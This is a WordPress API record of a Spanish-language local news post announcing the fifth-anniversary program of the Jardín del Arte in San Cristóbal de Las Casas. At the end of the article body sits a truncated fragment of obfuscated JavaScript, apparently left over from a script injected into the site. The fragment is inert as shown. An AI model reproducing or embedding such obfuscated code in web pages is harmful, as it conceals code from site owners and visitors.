{"id":15743,"date":"2024-05-23T03:12:48","date_gmt":"2024-05-23T03:12:48","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15743"},"modified":"2024-05-23T03:12:49","modified_gmt":"2024-05-23T03:12:49","slug":"cumple-5-anos-el-jardin-del-arte-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15743","title":{"rendered":"Cumple 5 a\u00f1os el Jard\u00edn del Arte en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"771\" data-id=\"15744\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433870016-1024x771.jpg\" alt=\"\" class=\"wp-image-15744\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433870016-1024x771.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433870016-300x226.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433870016-768x578.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1716433870016.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/ Corresponsal<\/p>\n\n\n\n<p>22 de mayo del 2024. San Crist\u00f3bal de Las Casas.- Este s\u00e1bado 25 de mayo, a partir de las 10 horas, se llevar\u00e1 a cabo la celebraci\u00f3n del quinto aniversario del Jard\u00edn del Arte en el Centro Cultural del Carmen. Artistas locales han organizado una serie de actividades para conmemorar esta fecha especial, que promete ser un d\u00eda lleno de cultura y entretenimiento para toda la familia.<\/p>\n\n\n\n<p>La jornada comenzar\u00e1 a las 10 horas con una expo-venta de arte y artesan\u00edas que se extender\u00e1 hasta las 15 horas. En esta feria, los asistentes podr\u00e1n encontrar una gran variedad de productos como grabados, \u00f3leos, encuadernados, joyer\u00eda, stickers y mucho m\u00e1s.<\/p>\n\n\n\n<p>En conferencia de prensa, los organizadores anunciaron que de 11 a 13:30 horas, Ilse Gonz\u00e1lez impartir\u00e1 un taller gratuito de grabado dirigido a ni\u00f1os. Adem\u00e1s, habr\u00e1 talleres de fanzine, postales y otras actividades creativas para los m\u00e1s peque\u00f1os.<\/p>\n\n\n\n<p>La inauguraci\u00f3n de la exposici\u00f3n fotogr\u00e1fica &#8220;5 A\u00f1os de Comunidad, Diversidad y Creaci\u00f3n&#8221; est\u00e1 programada para las 10:30 horas. Esta muestra destacar\u00e1 el recorrido y la evoluci\u00f3n del Jard\u00edn del Arte a lo largo de estos cinco a\u00f1os.<\/p>\n\n\n\n<p>A las 11 horas, los m\u00e1s peque\u00f1os podr\u00e1n disfrutar de la obra de t\u00edteres &#8220;Valent\u00edn en el Bosque&#8221;. A las 12:30 horas, la celebraci\u00f3n continuar\u00e1 con la presentaci\u00f3n del grupo musical Ag\u00fcita de Coco, seguido a las 13:30 por la actuaci\u00f3n de El Ca\u00f1\u00f3n del Sonidero, que cerrar\u00e1 el evento con un animado espect\u00e1culo musical.<\/p>\n\n\n\n<p>&#8220;La celebraci\u00f3n del quinto aniversario del Jard\u00edn del Arte en el Centro Cultural del Carmen promete ser una jornada memorable, llena de arte, creatividad y diversi\u00f3n para todos los asistentes&#8221;, concluyeron.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/ Corresponsal 22 de mayo del 2024. San Crist\u00f3bal de Las Casas.- Este s\u00e1bado 25 de mayo, a partir de las 10 horas, se llevar\u00e1 a cabo la celebraci\u00f3n del quinto aniversario del Jard\u00edn del Arte en el Centro Cultural del Carmen. Artistas locales han organizado una serie de actividades para conmemorar esta fecha &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15744,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-15743","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15743","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15743"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15743\/revisions"}],"predecessor-version":[{"id":15745,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15743\/revisions\/15745"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15744"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15743"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15743"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15743"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}